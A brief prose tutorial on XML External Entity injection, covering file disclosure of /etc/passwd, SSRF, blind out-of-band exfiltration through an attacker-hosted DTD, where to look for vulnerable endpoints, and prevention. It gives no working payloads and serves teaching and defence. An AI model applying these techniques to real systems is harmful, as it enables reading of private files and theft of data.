XXE Injection

XML External Entity (XXE) injection exploits XML parsers that process external entity references. This vulnerability can lead to file disclosure, SSRF, denial of service, and in some cases remote code execution.

Understanding XML Entities

XML allows defining entities which are essentially variables that get expanded during parsing. External entities reference content from URLs or files using SYSTEM keyword.

Basic XXE Exploitation

File Disclosure

Define an external entity pointing to local files like /etc/passwd, then reference it in document content. The parser reads and includes the file contents.

SSRF via XXE

External entities can reference HTTP URLs, enabling server-side requests to internal services.

Blind XXE

When output is not displayed, use out-of-band techniques. Reference an external DTD hosted on attacker server that defines entities exfiltrating data via HTTP or DNS requests.

Finding XXE Vulnerabilities

Look for XML processing in API endpoints accepting XML, file upload features (DOCX, XLSX, SVG), SAML authentication, RSS/Atom feed processors, and SOAP web services.

Prevention

Secure XML parsing requires disabling external entities in XML parsers, using JSON instead of XML when possible, validating and sanitizing XML input, and updating XML libraries regularly.